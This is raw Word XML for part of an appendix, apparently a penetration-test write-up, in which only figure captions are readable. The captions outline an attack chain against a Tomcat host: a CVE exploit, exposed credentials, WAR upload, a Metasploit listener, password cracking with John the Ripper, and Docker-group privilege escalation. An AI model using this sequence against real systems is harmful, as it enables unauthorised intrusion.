            <wp:docPr id="87533529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399405" cy="1859280"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="271" w:name="resource46"/>
    <w:p w14:paraId="672884A9" w14:textId="7DEB0C19"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"paragraph46"</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A.29</w:t>
      </w:r>
      <w:bookmarkEnd w:id="271"/>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Searching for Found CVE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DEA7B8" w14:textId="77777777" w:rsidR="005F3C61" w:rsidRPr="00D77DFE" w:rsidRDefault="005F3C61" w:rsidP="00F057ED">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D7D6697" w14:textId="32428659" w:rsidR="00F057ED" w:rsidRPr="00D77DFE" w:rsidRDefault="00F057ED" w:rsidP="00F057ED">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4E4739B3" wp14:editId="49508D1E">
            <wp:extent cx="5399405" cy="2353310"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="28905509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399405" cy="2353310"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="35146C18" w14:textId="092EE8E9"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bookmarkStart w:id="272" w:name="resource47"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Figure A.30</w:t>
      </w:r>
      <w:bookmarkEnd w:id="272"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: Source Code Exploit for CVE-2020-10487</w:t>
      </w:r>
      <w:r w:rsidR="00883F52">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD3D5CA" w14:textId="77777777" w:rsidR="005F3C61" w:rsidRPr="00D77DFE" w:rsidRDefault="005F3C61" w:rsidP="00F057ED">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46056A95" w14:textId="795A8E43" w:rsidR="00F057ED" w:rsidRPr="00D77DFE" w:rsidRDefault="00F057ED" w:rsidP="00F057ED">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334A75C" wp14:editId="60495BFB">
            <wp:extent cx="5399405" cy="1864360"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="149506927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399405" cy="1864360"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E9DC5E" w14:textId="67A9F81A"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bookmarkStart w:id="273" w:name="resource48"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Figure A.31</w:t>
      </w:r>
      <w:bookmarkEnd w:id="273"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: Using the Exploit Against CVE-2020-10487</w:t>
      </w:r>
      <w:r w:rsidR="00883F52">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426A1812" w14:textId="77777777" w:rsidR="005F3C61" w:rsidRPr="00D77DFE" w:rsidRDefault="005F3C61" w:rsidP="00F057ED">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BF7E31F" w14:textId="4047787D" w:rsidR="00F057ED" w:rsidRPr="00D77DFE" w:rsidRDefault="00F057ED" w:rsidP="00F057ED">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6A546E86" wp14:editId="2430AF0A">
            <wp:extent cx="4359349" cy="2183520"/>
            <wp:effectExtent l="0" t="0" r="3175" b="7620"/>
            <wp:docPr id="20282648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67576" cy="2187641"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="274" w:name="resource50"/>
    <w:p w14:paraId="1C5AFE6B" w14:textId="7E9FE5E4"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"paragraph50"</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A.32:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="274"/>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Trying the Exposed Credentials in Login Tomcat</w:t>
      </w:r>
      <w:r w:rsidR="00883F52">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBC224F" w14:textId="5FC35D72" w:rsidR="00F057ED" w:rsidRPr="00D77DFE" w:rsidRDefault="00F057ED"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36093ED4" wp14:editId="461C53B2">
            <wp:extent cx="4263656" cy="1898914"/>
            <wp:effectExtent l="0" t="0" r="3810" b="6350"/>
            <wp:docPr id="155042622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93691" cy="1912291"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="275" w:name="resource51"/>
    <w:bookmarkStart w:id="276" w:name="resource52"/>
    <w:p w14:paraId="464D64AC" w14:textId="574363F9"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"paragraph51"</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A.33</w:t>
      </w:r>
      <w:bookmarkEnd w:id="275"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkEnd w:id="276"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: Gaining Access to Tomcat Manager</w:t>
      </w:r>
      <w:r w:rsidR="00883F52">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7222705D" w14:textId="3555C781" w:rsidR="004F6D1C" w:rsidRPr="00D77DFE" w:rsidRDefault="004F6D1C" w:rsidP="004F6D1C">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106AF414" wp14:editId="61E916CB">
            <wp:extent cx="4465675" cy="949540"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="11321446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469730" cy="950402"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="402CFD78" w14:textId="4F5F22F2"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hyperlink w:anchor="paragraph52" w:history="1">
        <w:r w:rsidRPr="00D77DFE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>Figure A.34:</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Deploy WAR File Function</w:t>
      </w:r>
      <w:r w:rsidR="00883F52">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479CBB24" w14:textId="3DDC1A1D" w:rsidR="004F6D1C" w:rsidRPr="00D77DFE" w:rsidRDefault="004F6D1C"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94F7088" wp14:editId="41503A5F">
            <wp:extent cx="3533775" cy="371475"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="139021045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533775" cy="371475"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="277" w:name="resource53"/>
    <w:p w14:paraId="634A2688" w14:textId="30DBE724" w:rsidR="005F3C61" w:rsidRPr="00D77DFE" w:rsidRDefault="005F3C61" w:rsidP="00883F52">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"paragraph53"</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A.35</w:t>
      </w:r>
      <w:bookmarkEnd w:id="277"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</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Configuring the Local Host in Metasploit</w:t>
      </w:r>
      <w:r w:rsidR="00883F52">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBF2412" w14:textId="509DA15F" w:rsidR="004F6D1C" w:rsidRPr="00D77DFE" w:rsidRDefault="004F6D1C"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BD8F86B" wp14:editId="4E3489F7">
            <wp:extent cx="3581400" cy="342900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="199999105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581400" cy="342900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="278" w:name="resource54"/>
    <w:p w14:paraId="7AD66012" w14:textId="7F3F268B"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"paragraph54"</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A.36</w:t>
      </w:r>
      <w:bookmarkEnd w:id="278"/>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Running the Listener on Port 4444</w:t>
      </w:r>
      <w:r w:rsidR="00883F52">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64562736" w14:textId="77777777" w:rsidR="004F6D1C" w:rsidRPr="00D77DFE" w:rsidRDefault="004F6D1C" w:rsidP="004F6D1C">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5991B989" w14:textId="1899D6CC" w:rsidR="004F6D1C" w:rsidRPr="00D77DFE" w:rsidRDefault="004F6D1C" w:rsidP="004A072B">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4894F24A" wp14:editId="086B6321">
            <wp:extent cx="4914900" cy="1780838"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18714625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00" cstate="print">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4926088" cy="1784892"/>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79" w:name="resource55"/>
    <w:p w14:paraId="04F52381" w14:textId="34B693DD"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"paragraph55"</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A.37</w:t>
      </w:r>
      <w:bookmarkEnd w:id="279"/>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Visiting the Uploaded Application</w:t>
      </w:r>
      <w:r w:rsidR="00883F52">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EEF2ED" w14:textId="76D34EAF" w:rsidR="004A072B" w:rsidRPr="00D77DFE" w:rsidRDefault="004A072B" w:rsidP="005F3C61">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="280" w:name="resource56"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="456B7832" wp14:editId="1F037545">
            <wp:extent cx="5094515" cy="1331895"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="131306545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120141" cy="1338595"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7AAE25" w14:textId="5B535861"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hyperlink w:anchor="paragraph56" w:history="1">
        <w:r w:rsidRPr="00D77DFE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>Figure A.38:</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Permissions of redlowo User for Running Scripts as sudo</w:t>
      </w:r>
      <w:r w:rsidR="00883F52">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="280"/>
    <w:p w14:paraId="6AB75EA6" w14:textId="576994F0" w:rsidR="00FE5290" w:rsidRPr="00D77DFE" w:rsidRDefault="00FE5290" w:rsidP="00FE5290">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8DEE9AE" wp14:editId="0CA6F41C">
            <wp:extent cx="5023262" cy="1429648"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="4388676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039438" cy="1434252"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="281" w:name="resource57"/>
    <w:p w14:paraId="43EED454" w14:textId="27726BF0"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"paragraph57"</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 xml:space="preserve"> Figure A.39:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="281"/>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Cracking Password in John the Ripper</w:t>
      </w:r>
      <w:r w:rsidR="00883F52">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076B336F" w14:textId="626BFC05" w:rsidR="00FE5290" w:rsidRPr="00D77DFE" w:rsidRDefault="00FE5290"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30C818C6" wp14:editId="487C3392">
            <wp:extent cx="4940135" cy="385195"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="190245852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977930" cy="388142"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="282" w:name="resource58"/>
    <w:p w14:paraId="51E37C8B" w14:textId="6BA3A2D6"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"paragraph58"</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A.40</w:t>
      </w:r>
      <w:bookmarkEnd w:id="282"/>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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>stocznia</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> User is Included in Docker Group</w:t>
      </w:r>
      <w:r w:rsidR="00883F52">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AB348A" w14:textId="77777777" w:rsidR="005F3C61" w:rsidRPr="00D77DFE" w:rsidRDefault="005F3C61" w:rsidP="00FE5290">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1243E950" w14:textId="1C3B2CB7" w:rsidR="00FE5290" w:rsidRPr="00D77DFE" w:rsidRDefault="00FE5290" w:rsidP="00FE5290">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47D9ED9" wp14:editId="0AD59144">
            <wp:extent cx="4656455" cy="546530"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="14512749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960041" cy="582162"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="283" w:name="resource59"/>
    <w:p w14:paraId="1602D366" w14:textId="7FAAE4F9"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"paragraph59"</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A.41</w:t>
      </w:r>
      <w:bookmarkEnd w:id="283"/>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Mounting Sopot User Directory</w:t>
      </w:r>
      <w:r w:rsidR="00883F52">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2312EABA" w14:textId="77777777" w:rsidR="00FE5290" w:rsidRPr="00D77DFE" w:rsidRDefault="00FE5290" w:rsidP="005F3C61">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76C39CBC" wp14:editId="15766799">
            <wp:extent cx="3295650" cy="1028700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2507547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295650" cy="1028700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkStart w:id="284" w:name="resource61"/>
    </w:p>
    <w:bookmarkStart w:id="285" w:name="resource60"/>
    <w:p w14:paraId="442C83D4" w14:textId="5A1F20C3"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"paragraph60"</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A.42:</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Content of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>my_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>backup.save</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> File</w:t>
      </w:r>
      <w:bookmarkEnd w:id="285"/>
      <w:r w:rsidR="00883F52">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="284"/>
    <w:p w14:paraId="40A250FC" w14:textId="65F8800B" w:rsidR="00FE5290" w:rsidRPr="00D77DFE" w:rsidRDefault="00FE5290"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22E4DA95" wp14:editId="253B1099">
            <wp:extent cx="3162300" cy="1066800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="64039625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162300" cy="1066800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5318E27E" w14:textId="7738BFDD" w:rsidR="005F3C61" w:rsidRPr="00D77DFE" w:rsidRDefault="005F3C61" w:rsidP="005F3C61">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="paragraph61" w:history="1">
        <w:r w:rsidRPr="00D77DFE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>Figure A.43:</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
